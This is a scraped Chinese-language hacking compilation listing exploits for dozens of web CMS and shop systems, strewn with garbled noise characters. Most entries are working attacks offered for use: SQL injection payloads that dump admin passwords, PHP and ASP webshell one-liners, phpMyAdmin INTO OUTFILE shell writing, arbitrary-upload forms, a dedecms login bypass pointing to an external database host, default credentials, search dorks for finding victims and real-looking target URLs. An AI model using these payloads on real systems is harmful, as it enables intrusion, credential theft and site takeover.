启航企业建站系统 cookie注入漏洞通杀所有版本
$ a0 l& J7 u) y) B0 J y1 _9 @. o& Y, P' u( s: S
直接上exploit:8 M; H, p% D' l
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
' D, ?0 E6 {: R$ e0 Btest:http://www.tb11.net/system/xitong/shownews.asp?id=210
, |& g Y! g: H2 K$ h5 @4 F6 S--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 m! u- @/ V/ |* V9 _% N7 i! o
Asprain论坛 注册用户 上传图片就可拿到webshell: O* w( ?$ i* O9 }/ U! p
! y; ^& T" E0 h8 r. ^Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
% ^+ C+ b0 T: P( X) p3 \3 X1.txt存放你的一句话马 如:<%execute(request("cmd"))%>6 \# U2 I- ~* x
2.gif 为一小图片文件,一定要小,比如qq表情图片
, Z. t+ }$ y5 t# f: o" }$ G3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
7 Y r* H3 S1 B! n& F; g7 A4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
4 }: y! \ X+ `2 \' m5.q.asp;.gif
7 b, t0 a1 }% R5 G% X6 Rgoogle:Powered by Asprain
1 C, n5 ~% d$ M( Q |--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" \% p* @6 Y, R. k
2 w$ J3 X. c5 t% D7 hShopNum1全部系统存在上传漏洞。
9 q/ I4 H5 X8 {& g+ _
3 e( E6 a1 ] D& q首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。" u1 [. L0 S) ?& |4 O7 |5 P
按说明 提示登录后台。。- k) y0 X: I. n
在后台功能页面->附件管理->附件列表
7 T. |6 I) E( a4 ?; c3 ^/ @$ n可以直接上传.aspx 后缀木马* a1 N6 a& l) h8 ~' O# h8 L
http://demo.shopnum1.com/upload/20110720083822500.aspx" z: D' y! D7 T
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 w: b! q; y. ?! f0 |$ ]1 r
. w, ^ Z+ o G" C' \$ Q牛牛CMS中小企业网站管理系统 上传漏洞
' ~5 V0 D- U3 O. E# u' D& u5 k' K: |7 [# t, C e
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
+ _0 v* z6 L" N$ }后台:admin/login.asp
: U7 k/ t7 f% X/ gewebeditor 5.5 Nday
! t9 X4 m. o! e t' ?9 O9 yexp:
$ Y* u4 p7 ~! }# {% Q1 y( b<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?: q2 s O! `, T$ r, }. Z
<input?type=file?name=uploadfile?size=100><br><br>?% }$ N8 [# q1 y1 J: ]) u# s" S
<input?type=submit?value=upload>?. J. n/ K) e- T
</form>
4 W. B& d3 @* m0 e" C2 [ps:先上传小马.3 s* {# S/ m* M# k
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
3 [9 D( M8 y+ ^# b0 a- o4 b0 T& _* z# c2 S; j" z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 q* t) L: U& {; t# Y. Q8 s9 ~) l- `
7 h3 G% K* T/ H0 w7 ~YothCMS 遍历目录漏洞
; Y! x" k8 f" K1 e' C" t. c! h$ U1 j* E) j9 Z, ~( G' y- Q
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。" p2 u! L5 |" ^ t2 A/ T
默认后台:admin/login.asp! C- n2 O3 z6 O, f4 W0 h: `
遍历目录:2 \& j: k3 Q1 F! G- t
ewebeditor/manage/upload.asp?id=1&dir=../1 D' U3 Z! V# x
data:) m1 b1 ], F2 X9 {$ e5 _
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
+ ~, a& k) C0 A--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ X5 {2 T9 O2 N" k, q
, x& h9 T) p, x$ z
Net112企业建站系统 1.0
) O" A: j& u/ @' U. v g1 [8 l( T* _9 Y: c/ \; U6 \# r3 r
源码简介:
( ]* m5 x/ E! U: x$ ?Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
* C! t+ E% r& y m添加管理员:
* ^* o( a: t" m, bhttp://www.0855.tv/admin/admin.asp?action=add&level=2& L. u/ j3 f# i
其实加不加都不是很重要,后台文件都没怎么作验证。* @' L( b# g. {5 c# H' D8 p& u
上传路径:
. d1 b2 M, {: H' H' R* K6 whttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2000 E& C1 n/ z+ ]
http://www.0855.tv/inc/Upfile.asp?Stype=2+ v( w! p1 f6 q3 S W: J! c: {
怎么利用自己研究。
' b; z" j: I8 l% E( r遍历目录:
# f# C$ C4 K6 T2 J3 |http://www.0855.tv/admin/upfile.asp?path=../..
5 i+ r, _6 w, z: m$ Y! n如:
+ R! B! d+ P. t( [2 `6 Rhttp://www.0855.tv/admin/upfile.asp?path=../admin
2 ], `# l$ |* F1 F4 _1 h9 X( ~http://www.0855.tv/admin/upfile.asp?path=../data
0 X5 ^* R% [! u! s+ R6 C--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! ]- i# X% T1 }( V4 S& `: u, V6 s
M# @2 D9 ]( h: W
易和阳光购物商城通杀 上传漏洞1 t" H o3 A/ m# X# W
8 M$ Y; P" J; V: ~! U S- j
前提要求是IIS6.0+asp坏境。
. u. O0 p1 p6 i; @漏洞文件Iheeo_upfile.asp 1 a: N0 j2 @( ^+ @, m
过滤不严.直接可以iis6.0上传
0 [5 h- a6 D7 B3 ^ @7 C把ASP木马改成0855.asp;1.gif
8 g5 E# E; \/ i# m直接放到明小子上传
# ~9 a+ @4 [; N! yGoogle搜索:inurl:product.asp?Iheeoid=
: _0 w/ Q. z3 n. @5 o; c--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, U n: H/ K! C1 {+ B8 q+ u& X J
" z m8 ?3 V/ Gphpmyadmin后台4种拿shell方法* L- D7 \" {4 j( f, A
5 k. Z* p6 {+ g6 b2 R% j
方法一: N/ u3 l5 M+ D F. G3 _$ l/ Q
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
0 b2 a: s, H/ p% w) [+ sINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
0 V& X/ m0 ]2 bSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
H2 y& L8 @! `* Q----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
; V4 z* q' ~( {3 @" w一句话连接密码:xiaoma( d7 }7 s$ `8 K" H+ i: w. }
方法二:
. M' m( P0 @& R2 O, BCreate TABLE xiaoma (xiaoma1 text NOT NULL);+ P1 l5 G: t0 i/ i
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
3 O2 Q0 l+ h+ p5 qselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
2 U7 {, V% B% IDrop TABLE IF EXISTS xiaoma;" ], r/ t# `: J9 u& f
方法三:4 ~* C( q- Q; O7 H% ^8 q
读取文件内容: select load_file('E:/xamp/www/s.php');
$ j! s/ l# {! @写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'9 z+ n# Q* \& V' T4 E$ ?: r# {" R
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
# G% d9 W$ I( q! f3 ]方法四:* o/ S( V0 C% Z e' e6 \2 k" C
select load_file('E:/xamp/www/xiaoma.php');
& N. E0 P# h2 n; C: l: W0 F+ ~" Yselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
. k. R2 T- ~" a% C+ [然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
* D* E& q& M/ Q8 C; M6 ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 L6 }' x' Y' {. K6 d
) d- k% a* N! B# j传信网络独立开发网站源码0day漏洞" k( w: k2 Y( X3 X% k3 k0 b
# `6 Q8 y' J/ K
后台system/login.asp( g! _1 B2 B2 I/ p" J. g1 g
进了后台有个ewebeditor6 J" L; }* K7 L* z
Google 搜索inurl:product1.asp?tyc=5 K. _& ~' L0 g" e* [
编辑器漏洞默认后台ubbcode/admin_login.asp) x( |( k- R' @( R6 X
数据库ubbcode/db/ewebeditor.mdb
) E+ {& q( Z; q7 N0 v2 R3 H默认账号密码yzm 111111
( W& i: d, h; k( E1 k* p1 S
) {! M2 ~! g) o0 W拿webshell方法' r/ u" v6 z- i* d8 }, \! K# n
登陆后台点击“样式管理”-选择新增样式 & j H+ g- @' z
样式名称:scriptkiddies 随便写
! X% p6 [. i0 W* r路径模式:选择绝对路径 0 @) m q! s! s: ]
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
9 l; S* o" g) A: P& K3 [: L图片类型比如就是我们要上传的ASP木马格式4 K; i% k% s* P' \; p
上传路径:/
4 U5 u G8 H& u; m4 O图片限制:写上1000 免的上不了我们的asp木马1 ?! `+ p& |" @$ O# e8 K" v3 W
上传内容不要写
9 @6 E5 R7 q' m7 c% h/ s可以提交了
- y( J. R: m1 H- n8 t% k样式增加成功!
% g9 ^4 e4 d5 m# T; ^0 L9 ^返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 3 i8 ~: B/ k5 @
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
. W) K- I/ D# N1 U- c6 @网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
1 A3 Z' W' P$ Q上ASP木马 回车 等到路径
& v- y/ f, [7 I& c/ M
5 R) T' I5 c5 I4 h& W; v8 ~6 H后台:system/login.asp A' f4 r# Y5 q ?6 G
Exp:; A& j0 Q# j: S" D* `, B/ d$ A. v0 g. H
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master" A8 y, g n6 J$ j7 X% r! R
测试:3 Q7 `& f* E9 N/ U
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master8 u! _0 p5 C4 v2 x+ \& _
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master/ p) O, g2 G- f; o7 j
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* u) b% z% t5 o, n# y( [7 n
q" f. n# ]' b) h; [- K& X
foosun 0day 最新注入漏洞3 N- K& j! c4 X/ z- c& k0 ]1 g
8 E* N- h+ _ {! p0 a7 i
漏洞文件:www.xxx.com/user/SetNextOptions.asp4 a* O* l- D& L n
利用简单的方法:/ ^: z5 f9 q6 q; M) l k& x
暴管理员帐号:, Z/ g. Y( b" Q
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin' s/ v- a0 U5 |2 q
暴管理员密码:
$ `5 T( W5 |$ W" U) q$ Mhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
, G# I$ x) t T5 X4 x1 _7 Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 b4 U9 F6 P* p9 Y, }9 @# q2 |0 R" A# s1 X8 j$ O6 s1 L
网站程序的版权未知!
7 N- r8 p" k( I' D
6 E, F, F O n( ^默认网站数据库:' ]$ q- F1 N+ W. k# _1 p1 Z) T' t# I
www.i0day.com/data/nxnews.mdb
) C4 A! e, ~9 dewebeditor 在线编辑器:1 Q3 p2 I" s0 W/ a% b2 _8 Y" q
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb$ c9 q: h* ?6 |4 z( E1 l& d* ?3 `, J; M+ m
登录地址:ewebeditor/admin_login.asp
. E+ W. b q; ` k0 B. s9 h" `默认密码:admin admin
# a2 q* u I# z: e7 F登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
) E! `3 l$ ]/ S' R( c/ D
# O9 F( p* u/ U0 ISql注入漏洞:
6 F6 Q5 ~: T- {8 e4 L: K' C4 Ohttp://www.i0day.com/detail.asp?id=12
5 \, _2 @2 f* Y) y( H* o- v' Nexp:& Q! x1 ^$ ]6 G$ p3 E
union select 1,admin,password,4,5,6,7,8 from admin0 T8 z. Q' H+ q- m
爆出明文帐号/密码
% c& [0 h2 T. h$ f
. O T( z; L$ c. _+ R$ G* d! x上传漏洞:7 r, ]5 O& }: K+ Y2 s Z: ?
后台+upfile.asp: P e: K& x- C" F, E: M: z5 ?2 D6 |
如:8 c, E0 u2 G( A% u' ]
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
% m9 {& t; ]) [9 w7 z) Gshell的地址:网址+后台+成功上传的马
( K" N) S% I0 L5 }2 @- z; Lgoogle:inurl:news.asp?lanmuName=4 ? }5 G# Q* P8 U* S& a
------------------------------------------------------------------------------------------------------------------------------------------------------------------------" I9 m7 _% m0 z( j* `7 C* ~" e
# F9 x7 Q' W; C! q; A( C. Cdedecms最新0day利用不进后台直接拿WEBSHELL
' j3 w# Q' b6 D% \$ Q$ l- b# l5 T/ d! k; [5 Q$ b0 F
拿webshell的方法如下:
9 @8 [0 W2 S/ P9 u' [2 P9 p+ b% p, H网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
* h9 i5 N. v; b/ E: R% T前题条件,必须准备好自己的dede数据库,然后插入数据:
z( ]5 ]' ^. }insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
- {, r8 ?! L/ g* x3 J
, e, U" H, J6 `7 f! _, h: z再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。3 A1 d- S: h4 O9 {
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"># B1 s5 y* G+ S: g; N) K
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
! y3 ^$ Z! c8 v' `<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />+ C: q/ o3 ^2 o5 c7 }4 @
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />& e. Q! d3 a# p* _
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
! r2 \3 B% M" ^: i3 \) ~7 u<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
/ J6 H2 R3 G P! g* t( G& d' `<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />5 u$ U6 m) [) R7 L# a# z% [
<input type="text" value="true" name="nocache" style="width:400">
7 A: N* {3 U+ ^) |2 D6 ?<input type="submit" value="提交" name="QuickSearchBtn"><br />( E3 N' ]# j7 z! Z7 S) `
</form>
" a3 y# K% f, V! M# E9 X. o0 F<script>" r/ r6 w( ~ {. \* Q8 m
function addaction()" l- l4 E0 j4 t- ~8 r' K
{
; G% A& Q' d" I& f+ b% `' z, u, Y; Qdocument.QuickSearch.action=document.QuickSearch.doaction.value;) k) D5 B0 O ?* o3 G/ Y. J$ _8 T: n7 i
}
; s0 J# y' m' o</script>0 H2 Q3 G4 D& P0 f2 X! c0 T
-----------------------------------------------------------------------------------------------------------------------------------------------
H- {. G5 y0 F. H7 b8 s8 U! d. J. j4 a' {' k/ O
dedecms织梦暴最新严重0day漏洞
+ K, [1 f( g2 u3 i2 d" y, O8 N' Jbug被利用步骤如下:
6 r. a2 m9 Y/ X9 [! fhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
4 v" ?1 R5 S, P% d/ `& y5 \3 Q; H把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
; C) D8 j1 g8 R9 w; | k3 |-------------------------------------------------------------------------------------------------------------------------------------------
3 b2 c0 [4 M9 i4 U8 c. |
- g& |8 i: P# z% T) J多多淘宝客程序上传漏洞 ! a; `) a% g8 c( S: u( ?7 v7 Q
漏洞页面:
: I0 m9 } D: t# } Fadmin\upload_pic.php
1 V, k% l9 |. m' v! s6 R传送门:0 m" f6 _8 l7 |
http://www.www.com/admin/upload_pic.php?uploadtext=slide1+ R8 O9 [: i# g
PS:copy张图片马 直接 xxx.php 上传抓包地址!
) S8 u) p8 ^, m; |# a' ~7 n------------------------------------------------------------------------------------------------------------------------------------------------------; M+ [, B" X: a+ o. S$ B8 A0 t
- |; g* T" C6 \! O6 x% V' u& e无忧公司系统ASP专业版后台上传漏洞
" Y" t) z! ]$ @' u; U6 M* c9 Y漏洞文件 后台上传- b l6 @. N) |* c* M- z
admin/uploadPic.asp' Y3 L6 T# \( k3 I. W1 J' q7 _
漏洞利用 这个漏洞好像是雷池的' Y" I$ w7 d0 ]7 `! i. x; n4 H
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1+ `' @: T6 k, K( t
等到的webshell路径:, v) o6 g3 `! r- b+ J
/UploadFiles/scriptkiddies.asp;_2.gif
7 w4 y) Y( b; U1 e$ R---------------------------------------------------------------------------------------------------------------------------------------------------7 U. X( P# l# A$ ?: m$ r
. w" L Q [( O( z住哪酒店分销联盟系统2010
' y: b5 i1 i9 T0 m0 H3 ^Search:
& c1 \1 q f1 a* Kinurl:index.php?m=hotelinfo
7 R& g1 z, r! l# h2 C8 Y0 ?http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin1 b2 g$ n% }8 S+ M
默认后台:index.php?m=admin/login
. t% J3 ?. j3 v3 B* Z: F( @* D4 V--------------------------------------------------------------------------------------------------------------------------------------------------- J g9 {1 I7 u. R5 w* d4 \. C1 |
$ V& m3 J/ M7 B3 \+ j( }
inurl:info_Print.asp?ArticleID=
8 O% e4 J p! l! W3 |后台 ad_login.asp
& M8 d7 @3 t( `) G8 n1 V% J2 `爆管理员密码:
' }; X4 x4 s5 X' n6 V' tunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
7 _# _* c9 P* u$ f1 [9 w------------------------------------------------------------------------------------------------------------------------------------------------------------
3 o6 G A' i) W
: [2 S7 [7 @% b; J: r: a搜索框漏洞!+ O4 E! \' u) i9 `: ~) E
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
) [% n4 E) p' v. ]--------------------------------------------------------------------------------------------------------------------------------------------------------
3 E5 t6 \' l* @3 ?% P3 ?, J1 r$ O$ w. O
关键字:3 t# `: W B9 r* {
inurl:/reg_TemletSel.asp?step=2( X" D& `' ?7 p/ t1 d: l' p0 M6 }7 {- T
或者, \7 H2 P$ ^- n2 a8 Z, N% d* q
电子商务自助建站--您理想的助手
6 R& E+ l$ e4 \7 [6 m-------------------------------------------------------------------------------------------------------------------------------------------------
% C. s7 ? \: ^! R# v- f7 z; a6 o% @! i8 K1 r
iGiveTest 2.1.0注入漏洞% Y: Z0 P9 K1 ?/ m, V
Version: <= 2.1.0
$ S+ s4 B, l R- b: \9 ]# Homepage: http://iGiveTest.com/9 n+ O2 E5 @, A- M
谷歌关键字: “Powered by iGiveTest”( L8 u- v( ]0 m6 w
随便注册一个帐号。然后暴管理员帐号和密码
4 Z8 y% Y# v/ @$ s Ohttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1( L2 @3 O( w S0 }3 Z7 W9 m) M
------------------------------------------------------------------------------------------------------------------------------------------------
: N* `" f' Z( @0 J k f6 B8 l6 G& B; r+ x
CKXP网上书店注入漏洞9 J$ _3 `2 g4 D& T% O+ ^' u
工具加表:shop_admin 加字段:admin7 S$ L) }' i1 |. B4 W9 X
后台:admin/login.asp 5 O# K% W9 X D# Y) x. v7 @
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
, O. o' r7 `9 {! N3 A7 D* Ginurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
" |: T: t: A2 f! c; w) I& m* {--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! p f7 |' L7 Z) |2 i1 W: p
0 ~% J& ^2 [7 a8 j% L段富超个人网站系统留言本写马漏洞
* m2 n7 v* N/ y$ ]. e: M' @源码下载:http://www.mycodes.net/24/2149.htm
. {8 Z1 U( H* q8 gaddgbook.asp 提交一句话。
$ _- U7 s- r3 I连接: http://www.xxxx.tv/date/date3f.asp
2 ?4 b9 }# D4 qgoogle:为防批量,特略!
+ m; q, X3 O; C9 C. h" u- W* L-------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 U- w R- U- |/ H) `
: A6 D7 w1 s f9 j9 f. X4 Y智有道专业旅游系统v1.0 注入及列目录漏洞% s3 w- d0 i7 O3 C/ k; [; a
默认后台路径:/admin/login.asp+ b1 Y7 ]/ M+ W+ d8 K- a" X
默认管理员:admin0 ]8 u3 q; x! K! M
默认密码:123456( v u5 u2 J X; G/ ?: Y
SQL EXP Tset:
* V# h; T& v$ q: h9 Yhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
* q5 m* D! v- Z/ F X! E2 W3 Z------------------------------------------------------------------------------------------------------------------------------------------------------------------------, M; e5 |" `' |5 ^& r+ r, ^
' F, e% A! U' B) newebeditor(PHP) Ver 3.8 本任意文件上传0day
7 X- m! K7 T0 |& z' MEXP:
0 N: {0 i4 H1 E+ V9 j0 v0 q1 k# s<title>eWebeditoR3.8 for php任意文件上EXP</title>' l0 L) X# [3 y+ T
<form action="" method=post enctype="multip& X* { o- b% S3 H% B7 S
art/form-data">
- U' c4 L3 M1 u<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 1 f5 f* B" q* G" e6 C
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
$ `& i& [* V$ a: r9 R6 m0 a" C<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> ' @5 \! y' ^( f; d( u. }& K& O
file:<input type=file name="uploadfile"><br> ! Q* _+ i7 r5 G/ v- n( w
<input type=button value=submit onclick=fsubmit()> ) v6 |0 j( p" C& h: s
</form><br>
' ?! O8 D5 j) ]/ u8 U6 |( R; ?<script> 4 Q' N' ^ ?3 o
function fsubmit(){ & k5 N6 E6 X/ f. S, k% h1 x5 e/ _
form = document.forms[0];
7 Z; E5 z2 c' n, ~2 B/ aform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
' C5 ?" _$ I6 v" Ualert(form.action);
, M* K# J2 n1 j0 {0 `5 b7 T0 ~! cform.submit();
y& t% N. [' ~8 o7 Z0 V. N} , K# B+ z7 S; `1 a; I) _
</script>8 z$ `+ u2 ^7 {& Z% [; @! s
注意修改里面ewebeditor的名称还有路径。5 P! I6 a9 [1 t
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& G' W( g$ z x4 [
! A: c, @0 a' P0 J7 b! W提交’时提示ip被记录 防注入系统的利用) e) j8 L/ i# `: [# i. |" e
网址:http://www.xxx.com/newslist.asp?id=122′
/ U$ a) d( Y P提示“你的操作已被记录!”等信息。, a& S% o6 J# g% A1 v( Z
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
0 P! }- F( S' ]5 N) c0 ^. ^1 B-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" V. F) g6 ]4 i' S
! F0 `: H7 \- [西部商务网站管理系统 批量拿shell-0day: W0 g; f5 F ~- P. E' ^
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
+ u# c' f J: o) F/ t1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛! _4 U9 D( v, E4 T) V+ `. {
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
: l5 X3 D7 X( e7 T0 ]% E, H3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂 ~! a( w* Y, _0 C' U7 X5 @6 g
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% b9 `% n- e: D& @; Y" v1 ~2 }, j* u- g& s; `
JspRun!6.0 论坛管理后台注入漏洞
; y% g6 n% r* M+ D
' R% J! x V& V7 k3 u5 Q9 ~SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
$ N. W& S. X8 ^2 Z. l# g$ lJspRun!6.0 6 A9 ^, T7 g9 Y: L9 |% h
漏洞描述:% `' s0 Q7 Y# g0 J- h
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
( q9 W$ b0 v( F% j$ B- d在处理后台提交的文件中ForumManageAction.java第1940行/ n0 i" |: e" Y' o1 T0 J% s
String export = request.getParameter("export");//直接获取,没有安全过滤# N+ l, I# p S, b# b
if(export!=null){
L' N- Q' y$ ^+ \- Y5 x" U, sList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...7 L- Z% g" ~2 _6 x4 Z
if(styles==null||styles.size()==0){
% E- {; U& k5 J<*参考+ z+ w3 C- I4 O, e# R
nuanfan@gmail.com
( K4 x/ Q, g! e& Q- U# T*> SEBUG安全建议:
/ j8 w& d7 W+ o- L- K3 Qwww.jsprun.net! E4 k, A7 n# S3 [* J$ ]9 B
(1)安全过滤变量export1 M8 O) w9 r8 B" ~, `. e
(2)在查询语句中使用占位符. g N3 U0 D# c5 ^, m8 [( c( x0 `7 ^
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ~9 e0 x4 W9 _+ N
7 B1 z& j; S0 E0 S( B: z3 |2 Z
乌邦图企业网站系统 cookies 注入 I! |( e" z) y, K, E* P
q9 S2 L% C% y% m$ ]2 q
程序完整登陆后台:/admin/login.asp' N, J$ R9 l/ q* K' n5 z
默认登陆帐号:admin 密码:admin888. m. u5 Q: e2 S
语句:(前面加个空格)
( d7 q" l# }. R- h; A, sand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin. E/ a& r4 ?* _
或者是16个字段:; g$ ~+ u; S' K
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin# D& i7 y" z z+ d! R9 r- ]
爆不出来自己猜字段。
+ L* s n' g9 W7 b9 Y5 @, ]注入点:http://www.untnt.com/shownews.asp?=88
9 ^, Q# s7 y6 Q; ]! H' V( c2 Z8 h. |, dgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp8 v# b, v b7 [( b# c
关键字:
5 G1 s3 {: l# u, {inurl:shownews?asp.id=
. W f! R; Y; V-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------' I" u" Z9 K: m! D _
% k1 w4 Q; P& f; t; P" \CKXP网上书店注入漏洞
( G4 y- d3 j5 K0 G* v( `6 z" f8 ]. G+ e/ i
工具加表:shop_admin 加字段:admin: ^# Q3 I& j9 x! P3 [( i
后台:admin/login.asp
- `# H% }; R5 u! |- e l- S+ X4 Q2 @/ ~登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/ ?' a5 ]/ G' R, ]+ U# g0 @
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息: d) ~, x: g4 C+ N0 |( i7 a
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------: r- T* _" z, i/ d
7 j" y7 ^6 M9 b1 CYxShop易想购物商城4.7.1版本任意文件上传漏洞3 y5 z$ T" K, h! D! U
% W( b0 \3 _' m" @2 j, Qhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx3 O5 W) t3 @, H* i( P
跳转到网站根目录上传任意文件。
% I5 N+ |' J& B: V) ]9 h* K, x如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
